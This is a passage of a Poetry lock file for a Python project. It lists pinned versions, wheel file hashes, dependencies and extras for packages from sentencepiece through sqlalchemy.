"sentencepiece-0.1.99-cp36-cp36m-manylinux_2_17_i686.manylinux2014_i686.whl", hash = "sha256:6a904c46197993bd1e95b93a6e373dca2f170379d64441041e2e628ad4afb16f"}, {file = "sentencepiece-0.1.99-cp36-cp36m-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:d89adf59854741c0d465f0e1525b388c0d174f611cc04af54153c5c4f36088c4"}, {file = "sentencepiece-0.1.99-cp36-cp36m-win32.whl", hash = "sha256:47c378146928690d1bc106fdf0da768cebd03b65dd8405aa3dd88f9c81e35dba"}, {file = "sentencepiece-0.1.99-cp36-cp36m-win_amd64.whl", hash = "sha256:9ba142e7a90dd6d823c44f9870abdad45e6c63958eb60fe44cca6828d3b69da2"}, {file = "sentencepiece-0.1.99-cp37-cp37m-macosx_10_9_x86_64.whl", hash = "sha256:b7b1a9ae4d7c6f1f867e63370cca25cc17b6f4886729595b885ee07a58d3cec3"}, {file = "sentencepiece-0.1.99-cp37-cp37m-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:d0f644c9d4d35c096a538507b2163e6191512460035bf51358794a78515b74f7"}, {file = "sentencepiece-0.1.99-cp37-cp37m-manylinux_2_17_i686.manylinux2014_i686.whl", hash = "sha256:c8843d23a0f686d85e569bd6dcd0dd0e0cbc03731e63497ca6d5bacd18df8b85"}, {file = "sentencepiece-0.1.99-cp37-cp37m-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:33e6f690a1caebb4867a2e367afa1918ad35be257ecdb3455d2bbd787936f155"}, {file = "sentencepiece-0.1.99-cp37-cp37m-win32.whl", hash = "sha256:8a321866c2f85da7beac74a824b4ad6ddc2a4c9bccd9382529506d48f744a12c"}, {file = "sentencepiece-0.1.99-cp37-cp37m-win_amd64.whl", hash = "sha256:c42f753bcfb7661c122a15b20be7f684b61fc8592c89c870adf52382ea72262d"}, {file = "sentencepiece-0.1.99-cp38-cp38-macosx_10_9_universal2.whl", hash = "sha256:85b476406da69c70586f0bb682fcca4c9b40e5059814f2db92303ea4585c650c"}, {file = "sentencepiece-0.1.99-cp38-cp38-macosx_10_9_x86_64.whl", hash = "sha256:cfbcfe13c69d3f87b7fcd5da168df7290a6d006329be71f90ba4f56bc77f8561"}, {file = "sentencepiece-0.1.99-cp38-cp38-macosx_11_0_arm64.whl", hash = "sha256:445b0ec381af1cd4eef95243e7180c63d9c384443c16c4c47a28196bd1cda937"}, {file = "sentencepiece-0.1.99-cp38-cp38-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:c6890ea0f2b4703f62d0bf27932e35808b1f679bdb05c7eeb3812b935ba02001"}, {file = "sentencepiece-0.1.99-cp38-cp38-manylinux_2_17_i686.manylinux2014_i686.whl", hash = "sha256:fb71af492b0eefbf9f2501bec97bcd043b6812ab000d119eaf4bd33f9e283d03"}, {file = "sentencepiece-0.1.99-cp38-cp38-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:27b866b5bd3ddd54166bbcbf5c8d7dd2e0b397fac8537991c7f544220b1f67bc"}, {file = "sentencepiece-0.1.99-cp38-cp38-win32.whl", hash = "sha256:b133e8a499eac49c581c3c76e9bdd08c338cc1939e441fee6f92c0ccb5f1f8be"}, {file = "sentencepiece-0.1.99-cp38-cp38-win_amd64.whl", hash = "sha256:0eaf3591dd0690a87f44f4df129cf8d05d8a4029b5b6709b489b8e27f9a9bcff"}, {file = "sentencepiece-0.1.99-cp39-cp39-macosx_10_9_universal2.whl", hash = "sha256:38efeda9bbfb55052d482a009c6a37e52f42ebffcea9d3a98a61de7aee356a28"}, {file = "sentencepiece-0.1.99-cp39-cp39-macosx_10_9_x86_64.whl", hash = "sha256:6c030b081dc1e1bcc9fadc314b19b740715d3d566ad73a482da20d7d46fd444c"}, {file = "sentencepiece-0.1.99-cp39-cp39-macosx_11_0_arm64.whl", hash = "sha256:84dbe53e02e4f8a2e45d2ac3e430d5c83182142658e25edd76539b7648928727"}, {file = "sentencepiece-0.1.99-cp39-cp39-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:0b0f55d0a0ee1719b4b04221fe0c9f0c3461dc3dabd77a035fa2f4788eb3ef9a"}, {file = "sentencepiece-0.1.99-cp39-cp39-manylinux_2_17_i686.manylinux2014_i686.whl", hash = "sha256:18e800f206cd235dc27dc749299e05853a4e4332e8d3dfd81bf13d0e5b9007d9"}, {file = "sentencepiece-0.1.99-cp39-cp39-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:2ae1c40cda8f9d5b0423cfa98542735c0235e7597d79caf318855cdf971b2280"}, {file = "sentencepiece-0.1.99-cp39-cp39-win32.whl", hash = "sha256:c84ce33af12ca222d14a1cdd37bd76a69401e32bc68fe61c67ef6b59402f4ab8"}, {file = "sentencepiece-0.1.99-cp39-cp39-win_amd64.whl", hash = "sha256:350e5c74d739973f1c9643edb80f7cc904dc948578bcb1d43c6f2b173e5d18dd"}, {file = "sentencepiece-0.1.99.tar.gz", hash = "sha256:189c48f5cb2949288f97ccdb97f0473098d9c3dcf5a3d99d4eabe719ec27297f"}, ] [[package]] name = "setuptools" version = "67.8.0" description = "Easily download, build, install, upgrade, and uninstall Python packages" optional = false python-versions = ">=3.7" files = [ {file = "setuptools-67.8.0-py3-none-any.whl", hash = "sha256:5df61bf30bb10c6f756eb19e7c9f3b473051f48db77fddbe06ff2ca307df9a6f"}, {file = "setuptools-67.8.0.tar.gz", hash = "sha256:62642358adc77ffa87233bc4d2354c4b2682d214048f500964dbe760ccedf102"}, ] [package.extras] docs = ["furo", "jaraco.packaging (>=9)", "jaraco.tidelift (>=1.4)", "pygments-github-lexers (==0.0.5)", "rst.linker (>=1.9)", "sphinx (>=3.5)", "sphinx-favicon", "sphinx-hoverxref (<2)", "sphinx-inline-tabs", "sphinx-lint", "sphinx-notfound-page (==0.8.3)", "sphinx-reredirects", "sphinxcontrib-towncrier"] testing = ["build[virtualenv]", "filelock (>=3.4.0)", "flake8-2020", "ini2toml[lite] (>=0.9)", "jaraco.envs (>=2.2)", "jaraco.path (>=3.2.0)", "pip (>=19.1)", "pip-run (>=8.8)", "pytest (>=6)", "pytest-black (>=0.3.7)", "pytest-checkdocs (>=2.4)", "pytest-cov", "pytest-enabler (>=1.3)", "pytest-mypy (>=0.9.1)", "pytest-perf", "pytest-ruff", "pytest-timeout", "pytest-xdist", "tomli-w (>=1.0.0)", "virtualenv (>=13.0.0)", "wheel"] testing-integration = ["build[virtualenv]", "filelock (>=3.4.0)", "jaraco.envs (>=2.2)", "jaraco.path (>=3.2.0)", "pytest", "pytest-enabler", "pytest-xdist", "tomli", "virtualenv (>=13.0.0)", "wheel"] [[package]] name = "sgmllib3k" version = "1.0.0" description = "Py3k port of sgmllib." optional = true python-versions = "*" files = [ {file = "sgmllib3k-1.0.0.tar.gz", hash = "sha256:7868fb1c8bfa764c1ac563d3cf369c381d1325d36124933a726f29fcdaa812e9"}, ] [[package]] name = "shapely" version = "2.0.2" description = "Manipulation and analysis of geometric objects" optional = true python-versions = ">=3.7" files = [ {file = "shapely-2.0.2-cp310-cp310-macosx_10_9_universal2.whl", hash = "sha256:6ca8cffbe84ddde8f52b297b53f8e0687bd31141abb2c373fd8a9f032df415d6"}, {file = "shapely-2.0.2-cp310-cp310-macosx_10_9_x86_64.whl", hash = "sha256:baa14fc27771e180c06b499a0a7ba697c7988c7b2b6cba9a929a19a4d2762de3"}, {file = "shapely-2.0.2-cp310-cp310-macosx_11_0_arm64.whl", hash = "sha256:36480e32c434d168cdf2f5e9862c84aaf4d714a43a8465ae3ce8ff327f0affb7"}, {file = "shapely-2.0.2-cp310-cp310-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:4ef753200cbffd4f652efb2c528c5474e5a14341a473994d90ad0606522a46a2"}, {file = "shapely-2.0.2-cp310-cp310-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:a9a41ff4323fc9d6257759c26eb1cf3a61ebc7e611e024e6091f42977303fd3a"}, {file = "shapely-2.0.2-cp310-cp310-win32.whl", hash = "sha256:72b5997272ae8c25f0fd5b3b967b3237e87fab7978b8d6cd5fa748770f0c5d68"}, {file = "shapely-2.0.2-cp310-cp310-win_amd64.whl", hash = "sha256:34eac2337cbd67650248761b140d2535855d21b969d76d76123317882d3a0c1a"}, {file = "shapely-2.0.2-cp311-cp311-macosx_10_9_universal2.whl", hash = "sha256:5b0c052709c8a257c93b0d4943b0b7a3035f87e2d6a8ac9407b6a992d206422f"}, {file = "shapely-2.0.2-cp311-cp311-macosx_10_9_x86_64.whl", hash = "sha256:2d217e56ae067e87b4e1731d0dc62eebe887ced729ba5c2d4590e9e3e9fdbd88"}, {file = "shapely-2.0.2-cp311-cp311-macosx_11_0_arm64.whl", hash = "sha256:94ac128ae2ab4edd0bffcd4e566411ea7bdc738aeaf92c32a8a836abad725f9f"}, {file = "shapely-2.0.2-cp311-cp311-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:fa3ee28f5e63a130ec5af4dc3c4cb9c21c5788bb13c15e89190d163b14f9fb89"}, {file = "shapely-2.0.2-cp311-cp311-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:737dba15011e5a9b54a8302f1748b62daa207c9bc06f820cd0ad32a041f1c6f2"}, {file = "shapely-2.0.2-cp311-cp311-win32.whl", hash = "sha256:45ac6906cff0765455a7b49c1670af6e230c419507c13e2f75db638c8fc6f3bd"}, {file = "shapely-2.0.2-cp311-cp311-win_amd64.whl", hash = "sha256:dc9342fc82e374130db86a955c3c4525bfbf315a248af8277a913f30911bed9e"}, {file = "shapely-2.0.2-cp312-cp312-macosx_10_9_universal2.whl", hash = "sha256:06f193091a7c6112fc08dfd195a1e3846a64306f890b151fa8c63b3e3624202c"}, {file = "shapely-2.0.2-cp312-cp312-macosx_10_9_x86_64.whl", hash = "sha256:eebe544df5c018134f3c23b6515877f7e4cd72851f88a8d0c18464f414d141a2"}, {file = "shapely-2.0.2-cp312-cp312-macosx_11_0_arm64.whl", hash = "sha256:7e92e7c255f89f5cdf777690313311f422aa8ada9a3205b187113274e0135cd8"}, {file = "shapely-2.0.2-cp312-cp312-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:be46d5509b9251dd9087768eaf35a71360de6afac82ce87c636990a0871aa18b"}, {file = "shapely-2.0.2-cp312-cp312-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:a5533a925d8e211d07636ffc2fdd9a7f9f13d54686d00577eeb11d16f00be9c4"}, {file = "shapely-2.0.2-cp312-cp312-win32.whl", hash = "sha256:084b023dae8ad3d5b98acee9d3bf098fdf688eb0bb9b1401e8b075f6a627b611"}, {file = "shapely-2.0.2-cp312-cp312-win_amd64.whl", hash = "sha256:ea84d1cdbcf31e619d672b53c4532f06253894185ee7acb8ceb78f5f33cbe033"}, {file = "shapely-2.0.2-cp37-cp37m-macosx_10_9_x86_64.whl", hash = "sha256:ed1e99702125e7baccf401830a3b94d810d5c70b329b765fe93451fe14cf565b"}, {file = "shapely-2.0.2-cp37-cp37m-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:e7d897e6bdc6bc64f7f65155dbbb30e49acaabbd0d9266b9b4041f87d6e52b3a"}, {file = "shapely-2.0.2-cp37-cp37m-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:0521d76d1e8af01e712db71da9096b484f081e539d4f4a8c97342e7971d5e1b4"}, {file = "shapely-2.0.2-cp37-cp37m-win32.whl", hash = "sha256:5324be299d4c533ecfcfd43424dfd12f9428fd6f12cda38a4316da001d6ef0ea"}, {file = "shapely-2.0.2-cp37-cp37m-win_amd64.whl", hash = "sha256:78128357a0cee573257a0c2c388d4b7bf13cb7dbe5b3fe5d26d45ebbe2a39e25"}, {file = "shapely-2.0.2-cp38-cp38-macosx_10_9_universal2.whl", hash = "sha256:87dc2be34ac3a3a4a319b963c507ac06682978a5e6c93d71917618b14f13066e"}, {file = "shapely-2.0.2-cp38-cp38-macosx_10_9_x86_64.whl", hash = "sha256:42997ac806e4583dad51c80a32d38570fd9a3d4778f5e2c98f9090aa7db0fe91"}, {file = "shapely-2.0.2-cp38-cp38-macosx_11_0_arm64.whl", hash = "sha256:ccfd5fa10a37e67dbafc601c1ddbcbbfef70d34c3f6b0efc866ddbdb55893a6c"}, {file = "shapely-2.0.2-cp38-cp38-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:e7c95d3379ae3abb74058938a9fcbc478c6b2e28d20dace38f8b5c587dde90aa"}, {file = "shapely-2.0.2-cp38-cp38-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:6a21353d28209fb0d8cc083e08ca53c52666e0d8a1f9bbe23b6063967d89ed24"}, {file = "shapely-2.0.2-cp38-cp38-win32.whl", hash = "sha256:03e63a99dfe6bd3beb8d5f41ec2086585bb969991d603f9aeac335ad396a06d4"}, {file = "shapely-2.0.2-cp38-cp38-win_amd64.whl", hash = "sha256:c6fd29fbd9cd76350bd5cc14c49de394a31770aed02d74203e23b928f3d2f1aa"}, {file = "shapely-2.0.2-cp39-cp39-macosx_10_9_universal2.whl", hash = "sha256:1f217d28ecb48e593beae20a0082a95bd9898d82d14b8fcb497edf6bff9a44d7"}, {file = "shapely-2.0.2-cp39-cp39-macosx_10_9_x86_64.whl", hash = "sha256:394e5085b49334fd5b94fa89c086edfb39c3ecab7f669e8b2a4298b9d523b3a5"}, {file = "shapely-2.0.2-cp39-cp39-macosx_11_0_arm64.whl", hash = "sha256:fd3ad17b64466a033848c26cb5b509625c87d07dcf39a1541461cacdb8f7e91c"}, {file = "shapely-2.0.2-cp39-cp39-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:d41a116fcad58048d7143ddb01285e1a8780df6dc1f56c3b1e1b7f12ed296651"}, {file = "shapely-2.0.2-cp39-cp39-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:dea9a0651333cf96ef5bb2035044e3ad6a54f87d90e50fe4c2636debf1b77abc"}, {file = "shapely-2.0.2-cp39-cp39-win32.whl", hash = "sha256:b8eb0a92f7b8c74f9d8fdd1b40d395113f59bd8132ca1348ebcc1f5aece94b96"}, {file = "shapely-2.0.2-cp39-cp39-win_amd64.whl", hash = "sha256:794affd80ca0f2c536fc948a3afa90bd8fb61ebe37fe873483ae818e7f21def4"}, {file = "shapely-2.0.2.tar.gz", hash = "sha256:1713cc04c171baffc5b259ba8531c58acc2a301707b7f021d88a15ed090649e7"}, ] [package.dependencies] numpy = ">=1.14" [package.extras] docs = ["matplotlib", "numpydoc (==1.1.*)", "sphinx", "sphinx-book-theme", "sphinx-remove-toctrees"] test = ["pytest", "pytest-cov"] [[package]] name = "singlestoredb" version = "0.7.2" description = "Interface to the SingleStore database and cluster management APIs" optional = true python-versions = ">=3.6" files = [ {file = "singlestoredb-0.7.2-cp36-abi3-macosx_10_9_universal2.whl", hash = "sha256:73f03aa356d5d566444572e385825ac726ca2c811c5c5754c4077cbf28a204c7"}, {file = "singlestoredb-0.7.2-cp36-abi3-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:baefc644f255d87a433198a1a5f20f0197f37fb693b0d0a04045c216d10357e8"}, {file = "singlestoredb-0.7.2-cp36-abi3-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:9d946a7436fdf7ba4c365cc7791be7566b7c5456e3acade75f6d9428f9de4bcb"}, {file = "singlestoredb-0.7.2-cp36-abi3-win32.whl", hash = "sha256:dcfc61a7720044ee444c97485471f22abae500e10dfe99290fa7219347b4bdb5"}, {file = "singlestoredb-0.7.2-cp36-abi3-win_amd64.whl", hash = "sha256:0d961aa12e8dfca837d4006c580c5ba2f33eff4ef447dee1e1bbb7af64b6b1c4"}, {file = "singlestoredb-0.7.2.tar.gz", hash = "sha256:99a0328814217a8517223f47374f6c359798df7f9e025d53bf071811f8fcf56b"}, ] [package.dependencies] build = "*" PyJWT = "*" requests = "*" sqlparams = "*" wheel = "*" [package.extras] dataframe = ["ibis-singlestoredb"] dbt = ["dbt-singlestore"] ed22519 = ["PyNaCl (>=1.4.0)"] gssapi = ["gssapi"] ibis = ["ibis-singlestoredb"] kerberos = ["gssapi"] rsa = ["cryptography"] sqlalchemy = ["sqlalchemy-singlestoredb"] [[package]] name = "six" version = "1.16.0" description = "Python 2 and 3 compatibility utilities" optional = false python-versions = ">=2.7, !=3.0.*, !=3.1.*, !=3.2.*" files = [ {file = "six-1.16.0-py2.py3-none-any.whl", hash = "sha256:8abb2f1d86890a2dfb989f9a77cfcfd3e47c2a354b01111771326f8aa26e0254"}, {file = "six-1.16.0.tar.gz", hash = "sha256:1e61c37477a1626458e36f7b1d82aa5c9b094fa4802892072e49de9c60c4c926"}, ] [[package]] name = "smmap" version = "5.0.1" description = "A pure Python implementation of a sliding window memory map manager" optional = true python-versions = ">=3.7" files = [ {file = "smmap-5.0.1-py3-none-any.whl", hash = "sha256:e6d8668fa5f93e706934a62d7b4db19c8d9eb8cf2adbb75ef1b675aa332b69da"}, {file = "smmap-5.0.1.tar.gz", hash = "sha256:dceeb6c0028fdb6734471eb07c0cd2aae706ccaecab45965ee83f11c8d3b1f62"}, ] [[package]] name = "sniffio" version = "1.3.0" description = "Sniff out which async library your code is running under" optional = false python-versions = ">=3.7" files = [ {file = "sniffio-1.3.0-py3-none-any.whl", hash = "sha256:eecefdce1e5bbfb7ad2eeaabf7c1eeb404d7757c379bd1f7e5cce9d8bf425384"}, {file = "sniffio-1.3.0.tar.gz", hash = "sha256:e60305c5e5d314f5389259b7f22aaa33d8f7dee49763119234af3755c55b9101"}, ] [[package]] name = "socksio" version = "1.0.0" description = "Sans-I/O implementation of SOCKS4, SOCKS4A, and SOCKS5." optional = true python-versions = ">=3.6" files = [ {file = "socksio-1.0.0-py3-none-any.whl", hash = "sha256:95dc1f15f9b34e8d7b16f06d74b8ccf48f609af32ab33c608d08761c5dcbb1f3"}, {file = "socksio-1.0.0.tar.gz", hash = "sha256:f88beb3da5b5c38b9890469de67d0cb0f9d494b78b106ca1845f96c10b91c4ac"}, ] [[package]] name = "soundfile" version = "0.12.1" description = "An audio library based on libsndfile, CFFI and NumPy" optional = true python-versions = "*" files = [ {file = "soundfile-0.12.1-py2.py3-none-any.whl", hash = "sha256:828a79c2e75abab5359f780c81dccd4953c45a2c4cd4f05ba3e233ddf984b882"}, {file = "soundfile-0.12.1-py2.py3-none-macosx_10_9_x86_64.whl", hash = "sha256:d922be1563ce17a69582a352a86f28ed8c9f6a8bc951df63476ffc310c064bfa"}, {file = "soundfile-0.12.1-py2.py3-none-macosx_11_0_arm64.whl", hash = "sha256:bceaab5c4febb11ea0554566784bcf4bc2e3977b53946dda2b12804b4fe524a8"}, {file = "soundfile-0.12.1-py2.py3-none-manylinux_2_17_x86_64.whl", hash = "sha256:2dc3685bed7187c072a46ab4ffddd38cef7de9ae5eb05c03df2ad569cf4dacbc"}, {file = "soundfile-0.12.1-py2.py3-none-manylinux_2_31_x86_64.whl", hash = "sha256:074247b771a181859d2bc1f98b5ebf6d5153d2c397b86ee9e29ba602a8dfe2a6"}, {file = "soundfile-0.12.1-py2.py3-none-win32.whl", hash = "sha256:59dfd88c79b48f441bbf6994142a19ab1de3b9bb7c12863402c2bc621e49091a"}, {file = "soundfile-0.12.1-py2.py3-none-win_amd64.whl", hash = "sha256:0d86924c00b62552b650ddd28af426e3ff2d4dc2e9047dae5b3d8452e0a49a77"}, {file = "soundfile-0.12.1.tar.gz", hash = "sha256:e8e1017b2cf1dda767aef19d2fd9ee5ebe07e050d430f77a0a7c66ba08b8cdae"}, ] [package.dependencies] cffi = ">=1.0" [package.extras] numpy = ["numpy"] [[package]] name = "soupsieve" version = "2.5" description = "A modern CSS selector implementation for Beautiful Soup." optional = false python-versions = ">=3.8" files = [ {file = "soupsieve-2.5-py3-none-any.whl", hash = "sha256:eaa337ff55a1579b6549dc679565eac1e3d000563bcb1c8ab0d0fefbc0c2cdc7"}, {file = "soupsieve-2.5.tar.gz", hash = "sha256:5663d5a7b3bfaeee0bc4372e7fc48f9cff4940b3eec54a6451cc5299f1097690"}, ] [[package]] name = "soxr" version = "0.3.7" description = "High quality, one-dimensional sample-rate conversion library" optional = true python-versions = ">=3.6" files = [ {file = "soxr-0.3.7-cp310-cp310-macosx_10_9_x86_64.whl", hash = "sha256:ac81c4af6a993d5b7c0b466bbac4835bad2b14ec32f342b2c1f83e4cf825e301"}, {file = "soxr-0.3.7-cp310-cp310-macosx_11_0_arm64.whl", hash = "sha256:8d8a2b3e7f8d0255e2484fb82cb66c86da6fb25b342ef793cceca9ce9a61aa16"}, {file = "soxr-0.3.7-cp310-cp310-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:a0cd6eb6f6bbda2e8de36672cf2f0529ced6e638773150744ef075be0cc4f52c"}, {file = "soxr-0.3.7-cp310-cp310-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:e47d86af35b942c92606fc2d5dfccf3f01309329475571ae2312bbf9edc3a790"}, {file = "soxr-0.3.7-cp310-cp310-win_amd64.whl", hash = "sha256:0e291adfaf9f2a7c4dd180a1b8c280f9beb1c84cb381853e4f4b3434d002ed7f"}, {file = "soxr-0.3.7-cp311-cp311-macosx_10_9_x86_64.whl", hash = "sha256:9e811450f0e91972932bd37ac58e32e44002c2c99db2aa926a9e7ba164545034"}, {file = "soxr-0.3.7-cp311-cp311-macosx_11_0_arm64.whl", hash = "sha256:9cea63014ce91035074e1228c9340e2b8609faf964e268705fcac5135d05060c"}, {file = "soxr-0.3.7-cp311-cp311-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:bfab27830f6217a15b83445988225c3aeea3bbccfa9399ced291e53e1b05925d"}, {file = "soxr-0.3.7-cp311-cp311-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:286858e3078d76c11b6d490b66fed3c9bb2a4229759f6be03ceef5c02189bf2c"}, {file = "soxr-0.3.7-cp311-cp311-win_amd64.whl", hash = "sha256:54985ff33292192d2937be80df3e5f3a44d6d53e6835f727d6b99b7cdd3f1611"}, {file = "soxr-0.3.7-cp312-cp312-macosx_10_9_x86_64.whl", hash = "sha256:83c74ef6d61d7dcd81be26f91bee0a420f792f5c1982266f2a80e655f0650a98"}, {file = "soxr-0.3.7-cp312-cp312-macosx_11_0_arm64.whl", hash = "sha256:cb1e14663a43fe88b8fbc287822a159028366a820abe1a0a9670fb53618cb47b"}, {file = "soxr-0.3.7-cp312-cp312-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:48acdfbcf870ab54f645b1cfd641bce92c1e3a67346c3bf0f6c0ad2873c1dd35"}, {file = "soxr-0.3.7-cp312-cp312-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:ea663b76f2b0ec1576b8a43aef317aec080abc0a67a4015fcd9f3407039f260a"}, {file = "soxr-0.3.7-cp312-cp312-win_amd64.whl", hash = "sha256:42da0d9eb79c70e5a41917f1b48a032e241a48eb4a1bcea7c80577302ff26974"}, {file = "soxr-0.3.7-cp37-cp37m-macosx_10_9_x86_64.whl", hash = "sha256:511c6b2279c8ddd83459d129d69f628f7aae4616ae0a1912963985bd89e35df7"}, {file = "soxr-0.3.7-cp37-cp37m-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:a37c518c0b5d70162956d808d6c2e249bae0672e414e0dcfc101e200d8c31f3c"}, {file = "soxr-0.3.7-cp37-cp37m-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:27f2890528d2b2e358938ab660a6b8346802863f5b6b646204d7ff8ab0ca2c66"}, {file = "soxr-0.3.7-cp37-cp37m-win_amd64.whl", hash = "sha256:52467c8c012495544a6dcfcce6b5bcbbc653d24fe9bb33c0b6191acecdb5e297"}, {file = "soxr-0.3.7-cp38-cp38-macosx_10_9_x86_64.whl", hash = "sha256:ce12b93747958f2769d6b297e6e27c73d9ad635fe8104ef052bece9c8a322824"}, {file = "soxr-0.3.7-cp38-cp38-macosx_11_0_arm64.whl", hash = "sha256:1cd65dc7b96ea3cb6c8c48e6020e859680556cc42dd3d4de44779530cce21037"}, {file = "soxr-0.3.7-cp38-cp38-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:d994f1a7690b1b13ab639ea33e0c1d78415b64d88d6df4af705a9443f97b9687"}, {file = "soxr-0.3.7-cp38-cp38-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:e87b58bc9e8c2caa16f07726f666bd043f0a49ca937baa803ce7708003b27833"}, {file = "soxr-0.3.7-cp38-cp38-win_amd64.whl", hash = "sha256:07f4c0c6125ea1482fa187ad5f007216712ee0a93586a9b2f80e79c0bf944cf7"}, {file = "soxr-0.3.7-cp39-cp39-macosx_10_9_x86_64.whl", hash = "sha256:e5267c3ba34d4b873d9bbe3a9e58418b01ae4fd04349a4f944d9943b9ddac0f7"}, {file = "soxr-0.3.7-cp39-cp39-macosx_11_0_arm64.whl", hash = "sha256:6e39668c250e221db888cf3b290a16fbe10a702d9a4eb604a127f720040de583"}, {file = "soxr-0.3.7-cp39-cp39-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:f8ceeb74e5a55d903cc286d3bd12c2d8f8c85d02894071e9ec92ab405430907c"}, {file = "soxr-0.3.7-cp39-cp39-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:0eed6bf58192dd1bb93becd2444de4d712689713d727b32fd55623ae9aae7df7"}, {file = "soxr-0.3.7-cp39-cp39-win_amd64.whl", hash = "sha256:7221302b4547d02a3f38dd3cd15317ab2b78873c75921db5f4a070848f0c71be"}, {file = "soxr-0.3.7.tar.gz", hash = "sha256:436ddff00c6eb2c75b79c19cfdca7527b1e31b5fad738652f044045ba6258593"}, ] [package.dependencies] numpy = "*" [package.extras] docs = ["linkify-it-py", "myst-parser", "sphinx", "sphinx-book-theme"] test = ["pytest"] [[package]] name = "sqlalchemy" version = "2.0.22" description = "Database Abstraction Library" optional = false python-versions = ">=3.7" files = [ {file = "SQLAlchemy-2.0.22-cp310-cp310-macosx_10_9_x86_64.whl", hash = "sha256:f146c61ae128ab43ea3a0955de1af7e1633942c2b2b4985ac51cc292daf33222"}, {file = "SQLAlchemy-2.0.22-cp310-cp310-macosx_11_0_arm64.whl", hash = "sha256:875de9414393e778b655a3d97d60465eb3fae7c919e88b70cc10b40b9f56042d"}, {file = "SQLAlchemy-2.0.22-cp310-cp310-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:13790cb42f917c45c9c850b39b9941539ca8ee7917dacf099cc0b569f3d40da7"}, {file = "SQLAlchemy-2.0.22-cp310-cp310-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:e04ab55cf49daf1aeb8c622c54d23fa4bec91cb051a43cc24351ba97e1dd09f5"}, {file = "SQLAlchemy-2.0.22-cp310-cp310-musllinux_1_1_aarch64.whl", hash = "sha256:a42c9fa3abcda0dcfad053e49c4f752eef71ecd8c155221e18b99d4224621176"}, {file = "SQLAlchemy-2.0.22-cp310-cp310-musllinux_1_1_x86_64.whl", hash = "sha256:14cd3bcbb853379fef2cd01e7c64a5d6f1d005406d877ed9509afb7a05ff40a5"}, {file = "SQLAlchemy-2.0.22-cp310-cp310-win32.whl", hash = "sha256:d143c5a9dada696bcfdb96ba2de4a47d5a89168e71d05a076e88a01386872f97"}, {file = "SQLAlchemy-2.0.22-cp310-cp310-win_amd64.whl", hash = "sha256:ccd87c25e4c8559e1b918d46b4fa90b37f459c9b4566f1dfbce0eb8122571547"}, {file = "SQLAlchemy-2.0.22-cp311-cp311-macosx_10_9_x86_64.whl", hash = "sha256:4f6ff392b27a743c1ad346d215655503cec64405d3b694228b3454878bf21590"}, {file = "SQLAlchemy-2.0.22-cp311-cp311-macosx_11_0_arm64.whl", hash = "sha256:f776c2c30f0e5f4db45c3ee11a5f2a8d9de68e81eb73ec4237de1e32e04ae81c"}, {file = "SQLAlchemy-2.0.22-cp311-cp311-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:c8f1792d20d2f4e875ce7a113f43c3561ad12b34ff796b84002a256f37ce9437"}, {file = "SQLAlchemy-2.0.22-cp311-cp311-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:d80eeb5189d7d4b1af519fc3f148fe7521b9dfce8f4d6a0820e8f5769b005051"}, {file = "SQLAlchemy-2.0.22-cp311-cp311-musllinux_1_1_aarch64.whl", hash = "sha256:69fd9e41cf9368afa034e1c81f3570afb96f30fcd2eb1ef29cb4d9371c6eece2"}, {file = "SQLAlchemy-2.0.22-cp311-cp311-musllinux_1_1_x86_64.whl", hash = "sha256:54bcceaf4eebef07dadfde424f5c26b491e4a64e61761dea9459103ecd6ccc95"}, {file = "SQLAlchemy-2.0.22-cp311-cp311-win32.whl", hash = "sha256:7ee7ccf47aa503033b6afd57efbac6b9e05180f492aeed9fcf70752556f95624"}, {file = "SQLAlchemy-2.0.22-cp311-cp311-win_amd64.whl", hash = "sha256:b560f075c151900587ade06706b0c51d04b3277c111151997ea0813455378ae0"}, {file = "SQLAlchemy-2.0.22-cp312-cp312-macosx_10_9_x86_64.whl", hash = "sha256:2c9bac865ee06d27a1533471405ad240a6f5d83195eca481f9fc4a71d8b87df8"}, {file = "SQLAlchemy-2.0.22-cp312-cp312-macosx_11_0_arm64.whl", hash = "sha256:625b72d77ac8ac23da3b1622e2da88c4aedaee14df47c8432bf8f6495e655de2"}, {file = 